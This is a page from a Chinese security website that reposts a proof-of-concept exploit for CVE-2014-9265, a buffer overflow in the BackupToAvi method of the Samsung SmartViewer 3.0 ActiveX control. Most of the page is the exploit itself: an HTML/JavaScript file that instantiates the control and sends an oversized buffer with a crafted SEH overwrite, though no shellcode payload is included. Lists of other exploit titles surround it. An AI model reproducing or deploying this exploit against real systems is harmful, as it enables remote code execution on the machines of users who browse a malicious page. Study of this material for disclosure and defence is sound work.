首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Samsung SmartViewer BackupToAvi 3.0 - Remote Code Execution
来源:http://darshanams.blogspot.com 作者:Darshanam 发布时间:2015-01-21  
<html>
<!--
Samsung SmartViewer BackupToAvi Remote Code Execution PoC
PoC developed by Praveen Darshanam

For more details refer
http://darshanams.blogspot.com
http://blog.disects.com/2015/01/samsung-smartviewer-backuptoavi-remote.html
Original Vulnerability Discovered by rgod
Vulnerable: Samsung SmartViewer 3.0
Tested on Windows 7 Ultimate N SP1
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9265
-->

<object classid='clsid:208650B1-3CA1-4406-926D-45F2DBB9C299' id='target' ></object>
<script >
var payload_length = 15000;
var arg1=1;
var arg2=1;
var arg3=1;
//blank strings
var junk = "";
var buf1 = "";
var buf2 = "";

//offset to SE is 156, initial analysis using metasploit cyclic pattern
for (i=0; i<156; i++)
{
  buf1 += "A";
}
var nseh = "DD";
var seh = "\x87\x10"; //from Vulnerable DLL
junk = buf1 + nseh + seh;

//remaining buffer
for (j=0; j<(payload_length-junk.length); j++)
{
  buf2 += "B";
}
//final malicious buffer
var fbuff = junk + buf2;
target.BackupToAvi(arg1 ,arg2 ,arg3 ,fbuff);

</script>
</html>
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·D-Link DSL-2730B Modem - XSS I
·Sim Editor 6.6 - Stack Based B
·D-Link DSL-2730B Modem - XSS I
·ManageEngine Multiple Products
·Palringo 2.8.1 - Stack Buffer
·MalwareBytes Anti-Exploit 1.03
·Congstar Internet-Manager SEH
·OS X 10.10 IOKit IntelAccelera
·T-Mobile Internet Manager SEH
·OS X networkd "effective_audit
·Wordpress Photo Gallery Unauth
·OS X 10.9.5 IOKit IntelAcceler
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved